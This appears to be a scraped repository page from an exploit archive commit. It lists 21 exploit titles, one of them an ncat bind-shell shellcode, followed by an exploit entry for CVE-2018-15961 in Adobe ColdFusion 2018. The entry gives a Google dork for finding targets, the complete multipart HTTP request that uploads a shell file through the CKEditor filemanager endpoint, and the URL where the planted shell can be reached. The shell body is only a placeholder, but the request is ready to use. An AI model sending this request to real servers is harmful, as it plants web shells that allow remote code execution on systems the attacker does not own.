a07949d1c7
21 changes to exploits/shellcodes SmartFTP Client 9.0.2623.0 - Denial of Service (PoC) LanSpy 2.0.1.159 - Local Buffer Overflow (PoC) XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection McAfee True Key - McAfee.TrueKey.Service Privilege Escalation DomainMOD 4.11.01 - Cross-Site Scripting DomainMOD 4.11.01 - 'raid' Cross-Site Scripting Tourism Website Blog - Remote Code Execution / SQL Injection Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery PrestaShop 1.6.x/1.7.x - Remote Code Execution DomainMOD 4.11.01 - Cross-Site Scripting PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion TP-Link wireless router Archer C1200 - Cross-Site Scripting Huawei B315s-22 - Information Leak ZTE ZXHN H168N - Improper Access Restrictions Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting Apache OFBiz 16.11.05 - Cross-Site Scripting HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection ThinkPHP 5.0.23/5.1.31 - Remote Code Execution Adobe ColdFusion 2018 - Arbitrary File Upload Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
# Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018
|
|
# Google Dork: ext:cfm
|
|
# Date: 10-12-2018
|
|
# Exploit Author: Pete Freitag of Foundeo
|
|
# Reversed: Vahagn vah_13 Vardanian
|
|
# Vendor Homepage: adobe.com
|
|
# Version: 2018
|
|
# Tested on: Adobe ColdFusion 2018
|
|
# CVE : CVE-2018-15961
|
|
# Comment: September 28, 2018: Updates for ColdFusion 2018 and ColdFusion
|
|
2016 have been elevated to Priority 1 due to a report that CVE-2018-15961
|
|
is now being actively exploited.
|
|
|
|
|
|
```
|
|
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
|
|
HTTP/1.1
|
|
Host: coldfusion:port
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
|
|
like Gecko) Chrome/62.0.3202.9 Safari/537.36
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------24464570528145
|
|
Content-Length: 303
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
-----------------------------24464570528145
|
|
Content-Disposition: form-data; name="file"; filename="shell_file"
|
|
Content-Type: image/jpeg
|
|
|
|
%shell code here%
|
|
-----------------------------24464570528145
|
|
Content-Disposition: form-data; name="path"
|
|
|
|
shell
|
|
-----------------------------24464570528145--
|
|
```
|
|
|
|
a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file |